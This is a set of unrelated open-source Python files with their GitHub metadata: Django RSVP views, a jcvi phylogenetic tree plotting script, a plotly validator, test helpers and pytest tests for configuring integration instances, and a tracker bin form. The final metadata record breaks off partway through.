occurrence = get_object_or_404(Occurrence, pk=occurrence_id)
try:
er = occurrence.eventreservations
except EventReservations.DoesNotExist:
er = EventReservations(occurrence=occurrence)
er.save()
rsvpers = er.reservations.all().order_by('last_name')
context = RequestContext(request, {'occurrence': occurrence,
'er': er,
'rsvpers': rsvpers})
return render_to_response(template_name, context)
@login_required
def user_reservations(request, user_id=None, template_name='django_reservations/user_reservations.html'):
"""
A reservation report for a specific user. Displays their reservation status
for all RSVP-enabled occurrences in the future.
"""
if user_id:
user = get_object_or_404(User, pk=user_id)
else:
user = request.user
# 2-tuple of (calendar, [occurrences])
cal_data = []
for calendar in Calendar.objects.all():
rsvped_occurrences = Occurrence.objects.filter(event__calendar=calendar, eventreservations__reservations=user, start__gt=datetime.datetime.now()).order_by('start')
cal_data.append((calendar, rsvped_occurrences))
context = RequestContext(request, dict(
cal_data=cal_data,
attendee=user
))
return render_to_response(template_name, context)
@login_required
def rsvp(request, occurrence_id, template_name='django_reservations/rsvp.html'):
"""
An rsvp page where the logged-in user can see their reservation status and
modify it.
"""
occurrence = get_object_or_404(Occurrence, pk=occurrence_id)
try:
er = occurrence.eventreservations
reserved = er.user_reserved(request.user)
except EventReservations.DoesNotExist:
reserved = False
if request.method == "POST":
form = RsvpForm(data=request.POST, instance=occurrence)
if form.is_valid():
occurrence = form.save()
if form.cleaned_data['attending']:
occurrence.eventreservations.reservations.add(request.user)
else:
try:
er = occurrence.eventreservations
er.reservations.remove(request.user)
except EventReservations.DoesNotExist:
pass # no reservations exist, no need to remove anything
return HttpResponseRedirect(reverse(
'reservations_reservations_view', kwargs={'occurrence_id':occurrence.pk}))
else:
form = RsvpForm(initial={'attending':reserved}, instance=occurrence)
context = RequestContext(request, {'form':form, 'occurrence':occurrence, 'reserved':reserved})
return render_to_response(template_name, context)
def rsvp_by_iso_date(request, event_id, iso_date):
"""
Make an rsvp for an occurrence that hasn't yet been persisted.
"""
t = datetime.datetime.strptime(iso_date, "%Y-%m-%dT%H:%M:%S")
event, occurrence = get_occurrence(event_id, year=t.year, month=t.month,
day=t.day, hour=t.hour,
minute=t.minute, second=t.second)
occurrence.save()
return rsvp(request, occurrence.pk)
|
{
"content_hash": "892c62b627a641f670b9a7383393736c",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 171,
"avg_line_length": 36.86486486486486,
"alnum_prop": 0.6659335288367546,
"repo_name": "winhamwr/django-reservations",
"id": "1a244b0225f648b3600ddc56485d9f8852a12b21",
"size": "4092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_reservations/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "10797"
}
],
"symlink_target": ""
}
|
import logging
import sys
from collections import defaultdict
from itertools import groupby
from ete3 import Tree
from jcvi.apps.base import OptionParser, glob
from jcvi.formats.base import LineFile
from jcvi.formats.sizes import Sizes
from jcvi.graphics.base import (
FancyBboxPatch,
Rectangle,
linear_shade,
markup,
normalize_axes,
plt,
savefig,
set3_n,
)
from jcvi.graphics.glyph import ExonGlyph, TextCircle, get_setups
class LeafInfoLine:
def __init__(self, row, delimiter=","):
args = [x.strip() for x in row.split(delimiter)]
self.name = args[0]
self.color = args[1]
self.new_name = None
if len(args) > 2:
self.new_name = args[2]
class LeafInfoFile(LineFile):
def __init__(self, filename, delimiter=","):
super(LeafInfoFile, self).__init__(filename)
self.cache = {}
with open(filename) as fp:
for row in fp:
if row[0] == "#":
continue
line = LeafInfoLine(row, delimiter=delimiter)
self.cache[line.name] = line
class WGDInfoLine:
def __init__(self, row, delimiter=",", defaultcolor="#7fc97f"):
args = [x.strip() for x in row.split(delimiter)]
self.node_name = args[0]
self.divergence = float(args[1]) / 100
self.name = args[2]
self.color = args[3] or defaultcolor
self.style = args[4]
class WGDInfoFile(LineFile):
def __init__(self, filename, delimiter=","):
super(WGDInfoFile, self).__init__(filename)
self.cache = defaultdict(list)
with open(filename) as fp:
for row in fp:
if row[0] == "#":
continue
line = WGDInfoLine(row, delimiter=delimiter)
self.cache[line.node_name].append(line)
def truncate_name(name, rule=None):
"""
shorten taxa names for tree display
Options of rule. This only affects tree display.
- headn (eg. head3 truncates first 3 chars)
- oheadn (eg. ohead3 retains only the first 3 chars)
- tailn (eg. tail3 truncates last 3 chars)
- otailn (eg. otail3 retains only the last 3 chars)
n = 1 ~ 99
"""
import re
if rule is None:
return name
k = re.search("(?<=^head)[0-9]{1,2}$", rule)
if k:
k = k.group(0)
tname = name[int(k) :]
else:
k = re.search("(?<=^ohead)[0-9]{1,2}$", rule)
if k:
k = k.group(0)
tname = name[: int(k)]
else:
k = re.search("(?<=^tail)[0-9]{1,2}$", rule)
if k:
k = k.group(0)
tname = name[: -int(k)]
else:
k = re.search("(?<=^otail)[0-9]{1,2}$", rule)
if k:
k = k.group(0)
tname = name[-int(k) :]
else:
print(truncate_name.__doc__, file=sys.stderr)
raise ValueError("Wrong rule for truncation!")
return tname
def draw_wgd_xy(ax, xx, yy, wgdline):
"""Draw WGD at (xx, yy) position
Args:
ax (axis): Matplotlib axes
xx (float): x position
yy (float): y position
wgdline (WGDInfo): WGDInfoLines that contains the styling information
"""
TextCircle(
ax,
xx,
yy,
wgdline.name,
fc=wgdline.color,
radius=0.0225,
color="k",
fontweight="bold",
)
def draw_wgd(ax, y, rescale, name, wgdcache):
"""Draw WGD given a name and the WGDInfo cache.
Args:
ax (matplotlib.axes): matplotlib axes
y (float): y position
rescale (function): Rescale function to generate x position
name (str): Name of the line (usually the taxon/internal name)
wgdcache (Dict): Dictionary containing WGDInfoLines
"""
if not wgdcache or name not in wgdcache:
return
for line in wgdcache[name]:
draw_wgd_xy(ax, rescale(line.divergence), y, line)
def draw_tree(
ax,
t,
hpd=None,
margin=0.1,
rmargin=0.2,
ymargin=0.1,
tip=0.01,
treecolor="k",
supportcolor="k",
internal=True,
outgroup=None,
dashedoutgroup=False,
reroot=True,
gffdir=None,
sizes=None,
trunc_name=None,
SH=None,
scutoff=0,
leafcolor="k",
leaffont=12,
leafinfo=None,
wgdinfo=None,
geoscale=False,
groups=[],
):
"""
main function for drawing phylogenetic tree
"""
if reroot:
if outgroup:
R = t.get_common_ancestor(*outgroup)
else:
# Calculate the midpoint node
R = t.get_midpoint_outgroup()
if R is not t:
t.set_outgroup(R)
# By default, the distance to outgroup and non-outgroup is the same
# we re-adjust the distances so that the outgroups will appear
# farthest from everything else
if dashedoutgroup:
a, b = t.children
# Avoid even split
total = a.dist + b.dist
newR = t.get_common_ancestor(*outgroup)
a.dist = 0.9 * total
b.dist = total - a.dist
farthest, max_dist = t.get_farthest_leaf()
print("max_dist = {}".format(max_dist), file=sys.stderr)
xstart = margin
ystart = 2 * ymargin
# scale the tree
scale = (1 - margin - rmargin) / max_dist
def rescale(dist):
return xstart + scale * dist
def rescale_divergence(divergence):
return rescale(max_dist - divergence)
num_leaves = len(t.get_leaf_names())
yinterval = (1 - ystart) / num_leaves
ytop = ystart + (num_leaves - 0.5) * yinterval
# get exons structures, if any
structures = {}
if gffdir:
gffiles = glob("{0}/*.gff*".format(gffdir))
setups, ratio = get_setups(gffiles, canvas=rmargin / 2, noUTR=True)
structures = dict((a, (b, c)) for a, b, c in setups)
if sizes:
sizes = Sizes(sizes).mapping
coords = {}
i = 0
color_groups = [] # Used to plot groups to the right of the tree
for n in t.traverse("postorder"):
dist = n.get_distance(t)
xx = rescale(dist)
if n.is_leaf():
yy = ystart + i * yinterval
i += 1
if trunc_name:
name = truncate_name(n.name, rule=trunc_name)
else:
name = n.name
if leafinfo and n.name in leafinfo:
line = leafinfo[n.name]
lc = line.color
sname = line.new_name
else:
lc = leafcolor
sname = None
lc = lc or "k"
sname = sname or name.replace("_", "-")
# if color is given as "R,G,B"
if "," in lc:
lc = [float(x) for x in lc.split(",")]
ax.text(
xx + tip,
yy,
markup(sname),
va="center",
fontstyle="italic",
size=leaffont,
color=lc,
)
color_groups.append((lc, yy, xx))
gname = n.name.split("_")[0]
if gname in structures:
mrnabed, cdsbeds = structures[gname]
ExonGlyph(
ax,
1 - rmargin / 2,
yy,
mrnabed,
cdsbeds,
align="right",
ratio=ratio,
)
if sizes and gname in sizes:
size = sizes[gname]
size = size / 3 - 1 # base pair converted to amino acid
size = "{0}aa".format(size)
ax.text(1 - rmargin / 2 + tip, yy, size, size=leaffont)
else:
linestyle = "--" if (dashedoutgroup and n is t) else "-"
children = [coords[x] for x in n.get_children()]
children_x, children_y = zip(*children)
min_y, max_y = min(children_y), max(children_y)
# plot the vertical bar
ax.plot((xx, xx), (min_y, max_y), linestyle, color=treecolor)
# plot the horizontal bar
for cx, cy in children:
ax.plot((xx, cx), (cy, cy), linestyle, color=treecolor)
yy = sum(children_y) * 1.0 / len(children_y)
# plot HPD if exists
if hpd and n.name in hpd:
a, b = hpd[n.name]
ax.plot(
(rescale_divergence(a), rescale_divergence(b)),
(yy, yy),
"-",
color="darkslategray",
alpha=0.4,
lw=2,
)
support = n.support
if support > 1:
support = support / 100.0
if not n.is_root() and supportcolor:
if support > scutoff / 100.0:
ax.text(
xx,
yy + 0.005,
"{0:d}".format(int(abs(support * 100))),
ha="right",
size=leaffont,
color=supportcolor,
)
if internal and n.name:
TextCircle(ax, xx, yy, n.name, size=9)
else: # Just a dot
TextCircle(ax, xx, yy, None, radius=0.002)
coords[n] = (xx, yy)
# WGD info
draw_wgd(ax, yy, rescale_divergence, n.name, wgdinfo)
# scale bar
if geoscale:
draw_geoscale(
ax, ytop, margin=margin, rmargin=rmargin, yy=ymargin, max_dist=max_dist
)
else:
br = 0.1
x1 = xstart + 0.1
x2 = x1 + br * scale
yy = ymargin
ax.plot([x1, x1], [yy - tip, yy + tip], "-", color=treecolor)
ax.plot([x2, x2], [yy - tip, yy + tip], "-", color=treecolor)
ax.plot([x1, x2], [yy, yy], "-", color=treecolor)
ax.text(
(x1 + x2) / 2,
yy - tip,
"{0:g}".format(br),
va="top",
ha="center",
size=leaffont,
color=treecolor,
)
# Groupings on the right, often to used to show groups such as phylogenetic
# clades
if groups:
color_groups.sort()
group_extents = []
for color, group in groupby(color_groups, key=lambda x: x[0]):
group = list(group)
_, min_yy, xx = min(group)
_, max_yy, xx = max(group)
group_extents.append((min_yy, max_yy, xx, color))
group_extents.sort(reverse=True)
for group_name, (min_yy, max_yy, xx, color) in zip(groups, group_extents):
group_color = linear_shade(color, fraction=0.85)
ax.add_patch(
FancyBboxPatch(
(xx, min_yy - yinterval / 2),
rmargin - 0.01,
max_yy - min_yy + yinterval,
boxstyle="round,pad=-0.002,rounding_size=0.005",
fc=group_color,
ec=group_color,
)
)
# Add the group label
horizontal = (max_yy - min_yy) < 0.2
mid_yy = (min_yy + max_yy) / 2
label_rightend = 0.98
if horizontal:
ax.text(
label_rightend,
mid_yy,
markup(group_name),
color="darkslategray",
ha="right",
va="center",
)
else:
ax.text(
label_rightend,
mid_yy,
markup(group_name),
color="darkslategray",
ha="right",
va="center",
rotation=-90,
)
if SH is not None:
xs = x1
ys = (ymargin + yy) / 2.0
ax.text(
xs,
ys,
"SH test against ref tree: {0}".format(SH),
ha="left",
size=leaffont,
color="g",
)
def read_trees(tree):
from urllib.parse import parse_qs
from jcvi.formats.base import read_block
trees = []
fp = open(tree)
for header, tx in read_block(fp, "#"):
header = parse_qs(header[1:])
label = header["label"][0].strip('"')
outgroup = header["outgroup"]
(color,) = header.get("color", ["k"])
trees.append((label, outgroup, color, "".join(tx)))
return trees
def draw_geoscale(
ax, ytop, margin=0.1, rmargin=0.2, yy=0.1, max_dist=3.0, contrast_epochs=True
):
"""
Draw geological epoch on million year ago (mya) scale.
max_dist = 3.0 => max is 300 mya
"""
import math
a, b = margin, 1 - rmargin # Correspond to 300mya and 0mya
minx, maxx = 0, int(max_dist * 100)
def cv(x):
return b - (x - b) / (maxx - minx) * (b - a)
ax.plot((a, b), (yy, yy), "k-")
tick = 0.0125
scale_start = int(math.ceil(maxx / 25) * 25)
for mya in range(scale_start - 25, 0, -25):
p = cv(mya)
ax.plot((p, p), (yy, yy - tick), "k-")
ax.text(p, yy - 2.5 * tick, str(mya), ha="center", va="center")
ax.text(
(a + b) / 2,
yy - 5 * tick,
"Time before present (million years)",
ha="center",
va="center",
)
# Source:
# https://en.wikipedia.org/wiki/Geological_period
Geo = (
("Neogene", 2.588, 23.03),
("Paleogene", 23.03, 66.0),
("Cretaceous", 66.0, 145.5),
("Jurassic", 145.5, 201.3),
("Triassic", 201.3, 252.17),
("Permian", 252.17, 298.9),
("Carboniferous", 298.9, 358.9),
)
h = 0.05
for (era, start, end), color in zip(Geo, set3_n(len(Geo))):
if maxx - start < 10: # not visible enough
continue
start, end = cv(start), cv(end)
end = max(a, end)
p = Rectangle((end, yy + tick / 2), abs(start - end), h, lw=1, ec="w", fc=color)
ax.text(
(start + end) / 2,
yy + (tick + h) / 2,
era,
ha="center",
va="center",
size=8,
)
ax.add_patch(p)
# We highlight recent epochs for better visualization, we just highlight
# Neogene and Cretaceous as these are more relevant for most phylogeny
if contrast_epochs:
for era, start, end in Geo:
if not era in ("Neogene", "Cretaceous"):
continue
# Make a beige patch
start, end = cv(start), cv(end)
ax.add_patch(
Rectangle(
(end, yy + tick + h),
abs(start - end),
ytop - yy - tick - h,
fc="beige",
ec="beige",
)
)
def parse_tree(infile):
"""Parse newick formatted tree file and returns a tuple consisted of a
Tree object, and a HPD dictionary if 95%HPD is found in the newick string,
otherwise None
Args:
infile (str): Path to the tree file
"""
import re
with open(infile) as fp:
treedata = fp.read()
hpd_re = re.compile(r"( \[&95%HPD=[^[]*\])")
def repl(match):
repl.count += 1
name = "N{}".format(repl.count)
lb, ub = re.findall(r"HPD=\{(.*), (.*)\}", match.group(0))[0]
repl.hpd[name] = (float(lb), float(ub))
return name
repl.count = 0
repl.hpd = {}
treedata, changed = re.subn(hpd_re, repl, treedata)
if repl.hpd:
print(repl.hpd, file=sys.stderr)
return (Tree(treedata, format=1), repl.hpd) if changed else (Tree(treedata), None)
def main(args):
"""
%prog newicktree
Plot Newick formatted tree. The gene structure can be plotted along if
--gffdir is given. The gff file needs to be `genename.gff`. If --sizes is
on, also show the number of amino acids.
"""
p = OptionParser(main.__doc__)
p.add_option(
"--outgroup",
help="Outgroup for rerooting the tree. "
+ "Use comma to separate multiple taxa.",
)
p.add_option(
"--noreroot",
default=False,
action="store_true",
help="Don't reroot the input tree",
)
p.add_option(
"--rmargin", default=0.2, type="float", help="Set blank rmargin to the right"
)
p.add_option("--gffdir", default=None, help="The directory that contain GFF files")
p.add_option("--sizes", default=None, help="The FASTA file or the sizes file")
p.add_option("--SH", default=None, type="string", help="SH test p-value")
group = p.add_option_group("Node style")
group.add_option("--leafcolor", default="k", help="Font color for the OTUs")
group.add_option("--leaffont", default=12, help="Font size for the OTUs")
group.add_option(
"--leafinfo", help="CSV file specifying the leaves: name,color,new_name"
)
group.add_option(
"--scutoff",
default=0,
type="int",
help="cutoff for displaying node support, 0-100",
)
group.add_option(
"--no_support",
dest="support",
default=True,
action="store_false",
help="Do not print node support values",
)
group.add_option(
"--no_internal",
dest="internal",
default=True,
action="store_false",
help="Do not show internal nodes",
)
group = p.add_option_group("Edge style")
group.add_option(
"--dashedoutgroup",
default=False,
action="store_true",
help="Gray out the edges connecting outgroup and non-outgroup",
)
group = p.add_option_group("Additional annotations")
group.add_option(
"--geoscale",
default=False,
action="store_true",
help="Plot geological scale",
)
group.add_option(
"--wgdinfo", help="CSV specifying the position and style of WGD events"
)
group.add_option(
"--groups",
help="Group names from top to bottom, to the right of the tree. "
"Each distinct color in --leafinfo is considered part of the same group. "
"Separate the names with comma, such as 'eudicots,,monocots,'. "
"Empty names will be ignored for that specific group. ",
)
opts, args, iopts = p.set_image_options(args, figsize="10x7")
if len(args) != 1:
sys.exit(not p.print_help())
(datafile,) = args
outgroup = None
reroot = not opts.noreroot
if opts.outgroup:
outgroup = opts.outgroup.split(",")
hpd = None
if datafile == "demo":
t = Tree(
"""(((Os02g0681100:0.1151,Sb04g031800:0.11220)1.0:0.0537,
(Os04g0578800:0.04318,Sb06g026210:0.04798)-1.0:0.08870)1.0:0.06985,
((Os03g0124100:0.08845,Sb01g048930:0.09055)1.0:0.05332,
(Os10g0534700:0.06592,Sb01g030630:0.04824)-1.0:0.07886):0.09389);"""
)
else:
logging.debug("Load tree file `{0}`".format(datafile))
t, hpd = parse_tree(datafile)
pf = datafile.rsplit(".", 1)[0]
fig = plt.figure(1, (iopts.w, iopts.h))
root = fig.add_axes([0, 0, 1, 1])
supportcolor = "k" if opts.support else None
margin, rmargin = 0.1, opts.rmargin # Left and right margin
leafinfo = LeafInfoFile(opts.leafinfo).cache if opts.leafinfo else None
wgdinfo = WGDInfoFile(opts.wgdinfo).cache if opts.wgdinfo else None
draw_tree(
root,
t,
hpd=hpd,
margin=margin,
rmargin=rmargin,
ymargin=margin,
supportcolor=supportcolor,
internal=opts.internal,
outgroup=outgroup,
dashedoutgroup=opts.dashedoutgroup,
reroot=reroot,
gffdir=opts.gffdir,
sizes=opts.sizes,
SH=opts.SH,
scutoff=opts.scutoff,
leafcolor=opts.leafcolor,
leaffont=opts.leaffont,
leafinfo=leafinfo,
wgdinfo=wgdinfo,
geoscale=opts.geoscale,
groups=opts.groups.split(",") if opts.groups else [],
)
normalize_axes(root)
image_name = pf + "." + iopts.format
savefig(image_name, dpi=iopts.dpi, iopts=iopts)
if __name__ == "__main__":
main(sys.argv[1:])
|
{
"content_hash": "0436c1ec770bae5e55136d753f95e4ef",
"timestamp": "",
"source": "github",
"line_count": 683,
"max_line_length": 88,
"avg_line_length": 29.765739385065885,
"alnum_prop": 0.5105755041810133,
"repo_name": "tanghaibao/jcvi",
"id": "dbb5164e3df51877465666b123ee259867802dec",
"size": "20377",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "jcvi/graphics/tree.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Cython",
"bytes": "10467"
},
{
"name": "Dockerfile",
"bytes": "1150"
},
{
"name": "Makefile",
"bytes": "445"
},
{
"name": "Python",
"bytes": "2635155"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class OutlinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name="outlinecolor",
parent_name="layout.mapbox.layer.fill",
**kwargs,
):
super(OutlinecolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
**kwargs,
)
|
{
"content_hash": "68e55243eed56730d95cc33aeaf0187e",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 73,
"avg_line_length": 29.1875,
"alnum_prop": 0.588865096359743,
"repo_name": "plotly/plotly.py",
"id": "2e5e9d29c7b8e581e2c17a4b3e3b1112921dfcab",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/mapbox/layer/fill/_outlinecolor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
import os, tempfile
import json
def write_command(output_directory=None,
command_name=None,
target_device=None,
command_id=None,
directory=None):
command = {}
def __write(key, parameter):
nonlocal command
if parameter is not None:
command[key] = parameter
__write('outputDirectory', output_directory)
__write('commandName', command_name)
__write('targetDevice', target_device)
__write('commandID', command_id)
cf = tempfile.mkstemp(dir=directory)[1]
with open(cf, 'w') as f:
json.dump(command, f, ensure_ascii=False)
return cf
def write_device_config(operating_system=None,
device_id=None,
data_source=None,
computer_name=None):
config = {}
def __write(key, attribute):
nonlocal config
if attribute is not None:
config[key] = [{"value": [attribute],
"weight": 1}]
__write('operating system', operating_system)
__write('device id', device_id)
__write('data source', data_source)
__write('computer name', computer_name)
cf = tempfile.mkstemp()[1]
with open(cf, 'w') as f:
json.dump(config, f, ensure_ascii=False)
return cf
def write_result_config(locate=None,
default=None,
refresh=None):
config = {}
def __write(key, command):
nonlocal config
if command is not None:
config[key] = [{"value": [command],
"weight": 1}]
__write('locate', locate)
__write('default', default)
__write('refresh', refresh)
cf = tempfile.mkstemp()[1]
with open(cf, 'w') as f:
json.dump(config, f, ensure_ascii=False)
return cf
|
{
"content_hash": "65bad2464703fca915082964d264e624",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 47,
"avg_line_length": 27.857142857142858,
"alnum_prop": 0.5754985754985755,
"repo_name": "bigfix/trask",
"id": "676883fcaca3c2bdf42ea417df2a4134b186d280",
"size": "1774",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "27433"
},
{
"name": "Shell",
"bytes": "329"
}
],
"symlink_target": ""
}
|
import pytest
from unittest.mock import mock_open
from Tests.configure_and_test_integration_instances import XSOARBuild, create_build_object, \
options_handler, XSIAMBuild, get_turned_non_hidden_packs, update_integration_lists, \
get_packs_with_higher_min_version, filter_new_to_marketplace_packs
XSIAM_SERVERS = {
"qa2-test-111111": {
"ui_url": "https://xsiam1.paloaltonetworks.com/",
"instance_name": "qa2-test-111111",
"api_key": "1234567890",
"x-xdr-auth-id": 1,
"base_url": "https://api1.paloaltonetworks.com/",
"xsiam_version": "3.2.0",
"demisto_version": "99.99.98"
},
"qa2-test-222222": {
"ui_url": "https://xsoar-content-2.xdr-qa2-uat.us.paloaltonetworks.com/",
"instance_name": "qa2-test-222222",
"api_key": "1234567890",
"x-xdr-auth-id": 1,
"base_url": "https://api-xsoar-content-2.xdr-qa2-uat.us.paloaltonetworks.com",
"xsiam_version": "3.2.0",
"demisto_version": "99.99.98"
}
}
def create_build_object_with_mock(mocker, build_object_type):
args = ['-u', "$USERNAME", '-p', "$PASSWORD", '-c', "$CONF_PATH", '-s', "$SECRET_CONF_PATH",
'--tests_to_run', "$ARTIFACTS_FOLDER/filter_file.txt",
'--pack_ids_to_install', "$ARTIFACTS_FOLDER/content_packs_to_install.txt",
'-g', "$GIT_SHA1", '--ami_env', "$1", '-n', 'false', '--branch', "$CI_COMMIT_BRANCH",
'--build-number', "$CI_PIPELINE_ID", '-sa', "$GCS_MARKET_KEY", '--build_object_type', build_object_type,
'--xsiam_machine', "qa2-test-111111", '--xsiam_servers_path', '$XSIAM_SERVERS_PATH']
options = options_handler(args=args)
json_data = {
'tests': [],
'skipped_integrations': [],
'unmockable_integrations': [],
}
json_data.update(**XSIAM_SERVERS)
mocker.patch('Tests.configure_and_test_integration_instances.get_json_file',
return_value=json_data)
mocker.patch('Tests.configure_and_test_integration_instances.Build.fetch_tests_list',
return_value=[])
mocker.patch('Tests.configure_and_test_integration_instances.Build.fetch_pack_ids_to_install',
return_value=[])
mocker.patch('Tests.configure_and_test_integration_instances.options_handler',
return_value=options)
mocker.patch('Tests.configure_and_test_integration_instances.XSOARBuild.get_servers',
return_value=({'1.1.1.1': '7000'}, '6.5.0'))
build = create_build_object()
return build
def test_configure_old_and_new_integrations(mocker):
"""
Given:
- A list of new integration that should be configured
- A list of old integrations that should be configured
When:
- Running 'configure_old_and_new_integrations' method on those integrations
Then:
- Assert there the configured old integrations has no intersection with the configured new integrations
"""
def configure_integration_instance_mocker(integration,
_,
__):
return integration
mocker.patch('Tests.configure_and_test_integration_instances.XSOARBuild.__init__',
return_value=None)
mocker.patch('Tests.configure_and_test_integration_instances.configure_integration_instance',
side_effect=configure_integration_instance_mocker)
build = XSOARBuild({})
build.servers = ['server1']
old_modules_instances, new_modules_instances = build.configure_modified_and_new_integrations(
modified_integrations_to_configure=['old_integration1', 'old_integration2'],
new_integrations_to_configure=['new_integration1', 'new_integration2'],
demisto_client_=None,
)
assert not set(old_modules_instances).intersection(new_modules_instances)
@pytest.mark.parametrize('expected_class, build_object_type', [(XSOARBuild, 'XSOAR'), (XSIAMBuild, 'XSIAM')])
def test_create_build(mocker, expected_class, build_object_type):
"""
Given:
- server_type of the server we run the build on: XSIAM or XSOAR.
When:
- Running 'configure_an_test_integration_instances' script and creating Build object
Then:
- Assert there the rigth Build object created: XSIAMBuild or XSOARBuild.
"""
build = create_build_object_with_mock(mocker, build_object_type)
assert isinstance(build, expected_class)
NON_HIDDEN_PACKS = [
("""
"tags": [],
+ "hidden": false,
"marketplaces": [
"xsoar",
"marketplacev2""", True),
("""
"tags": [],
+ "hidden": true,
"marketplaces": [
"xsoar",
"marketplacev2""", False),
("""
"tags": [],
"marketplaces": [
"xsoar",
"marketplacev2""", False),
("""
"tags": [],
+ "hidden": true,
- "hidden": false,
"marketplaces": [
"xsoar",
"marketplacev2""", False)
]
@pytest.mark.parametrize('diff, the_expected_result', NON_HIDDEN_PACKS)
def test_get_turned_non_hidden_packs(mocker, diff, the_expected_result):
"""
Given:
- A pack_metadata.json content returned from the git diff.
When:
- Running 'get_turned_non_hidden_packs' method.
Then:
- Assert the expected result is returned.
"""
build = create_build_object_with_mock(mocker, 'XSOAR')
mocker.patch('Tests.configure_and_test_integration_instances.run_git_diff', return_value=diff)
turned_non_hidden = get_turned_non_hidden_packs({'test'}, build)
assert ('test' in turned_non_hidden) is the_expected_result
UPDATE_INTEGRATION_LISTS = [
(['test1'], ['test2'], ['test2'], lambda new, modified: 'test2' in new and not modified),
(['test1'], ['test1'], ['test2'], lambda new, modified: 'test2' not in new and 'test2' in modified),
(['test1'], [], ['test2'], lambda new, modified: 'test2' not in new and 'test2' in modified),
(['test1'], ['test1'], ['test1'], lambda new, modified: len(new) == 1 and not modified)
]
@pytest.mark.parametrize(
'new_integrations_names, turned_non_hidden_packs_id, modified_integrations_names, the_expected_result',
UPDATE_INTEGRATION_LISTS)
def test_update_integration_lists(mocker, new_integrations_names, turned_non_hidden_packs_id,
modified_integrations_names, the_expected_result):
"""
Given:
- New integrations names, modifeid integrations names and turned non-hidden packs ids.
When:
- Running 'update_integration_lists' method.
Then:
- Assert the turned non-hidden integrations removed from the modified integrations list and
added to the new integration list.
"""
mocker.patch('Tests.configure_and_test_integration_instances.packs_names_to_integrations_names',
return_value=turned_non_hidden_packs_id)
returned_results = update_integration_lists(new_integrations_names, turned_non_hidden_packs_id, modified_integrations_names)
assert the_expected_result(returned_results[0], returned_results[1])
def test_get_packs_with_higher_min_version(mocker):
"""
Given:
- Pack names to install.
When:
- Running 'get_packs_with_higher_min_version' method.
Then:
- Assert the returned packs are with higher min version than the server version.
"""
mocker.patch("builtins.open", mock_open(read_data='{"serverMinVersion": "6.6.0"}'))
packs_with_higher_min_version = get_packs_with_higher_min_version({'TestPack'}, 'content', '6.5.0')
assert packs_with_higher_min_version == {'TestPack'}
CHANGED_MARKETPLACE_PACKS = [
("""
"dependencies": {},
"marketplaces": [
- "xsoar"
+ "xsoar",
+ "marketplacev2"
]
}""", 'XSOAR', set()),
("""
"dependencies": {},
"marketplaces": [
- "xsoar"
+ "xsoar",
+ "marketplacev2"
]
}""", 'XSIAM', {'pack_name'}),
("""
"dependencies": {},
"marketplaces": [
- "marketplacev2"
+ "marketplacev2",
+ "xsoar"
]
}""", 'XSOAR', {'pack_name'}),
]
@pytest.mark.parametrize('diff, build_type, the_expected_result', CHANGED_MARKETPLACE_PACKS)
def test_first_added_to_marketplace(mocker, diff, build_type, the_expected_result):
"""
Given:
- A pack_metadata.json content returned from the git diff.
When:
- Running 'get_turned_non_hidden_packs' method.
Then:
- Assert the expected result is returned.
"""
build = create_build_object_with_mock(mocker, build_type)
mocker.patch('Tests.configure_and_test_integration_instances.run_git_diff', return_value=diff)
first_added_to_marketplace = filter_new_to_marketplace_packs(build, {'pack_name'})
assert the_expected_result == first_added_to_marketplace
|
{
"content_hash": "70fef803d1c9e49f90953fc0b3bc2474",
"timestamp": "",
"source": "github",
"line_count": 232,
"max_line_length": 128,
"avg_line_length": 38.077586206896555,
"alnum_prop": 0.6281412723568033,
"repo_name": "demisto/content",
"id": "c1390a3183e48bf217806e97a63e623b39d8822b",
"size": "8834",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Tests/tests/configure_and_test_integration_instances_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "2146"
},
{
"name": "HTML",
"bytes": "205901"
},
{
"name": "JavaScript",
"bytes": "1584075"
},
{
"name": "PowerShell",
"bytes": "442288"
},
{
"name": "Python",
"bytes": "47881712"
},
{
"name": "Rich Text Format",
"bytes": "480911"
},
{
"name": "Shell",
"bytes": "108066"
},
{
"name": "YARA",
"bytes": "1185"
}
],
"symlink_target": ""
}
|
import ew
from ew import jinja2_ew
from allura.lib import validators as v
from forgetracker import model
class BinForm(ew.SimpleForm):
template = 'jinja:forgetracker:templates/tracker_widgets/bin_form.html'
defaults = dict(
ew.SimpleForm.defaults,
submit_text="Save Bin")
class hidden_fields(ew.NameList):
_id = jinja2_ew.HiddenField(
validator=v.Ming(model.Bin), if_missing=None)
class fields(ew.NameList):
summary = jinja2_ew.TextField(
label='Bin Name',
validator=v.UnicodeString(not_empty=True))
terms = jinja2_ew.TextField(
label='Search Terms',
validator=v.UnicodeString(not_empty=True))
|
{
"content_hash": "b634645aeb5fb6f9bb26d5512cd97ca8",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 75,
"avg_line_length": 29.791666666666668,
"alnum_prop": 0.6531468531468532,
"repo_name": "apache/allura",
"id": "7040ff39202c43d2ca099515f9c06048196837cb",
"size": "1585",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "ForgeTracker/forgetracker/widgets/bin_form.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
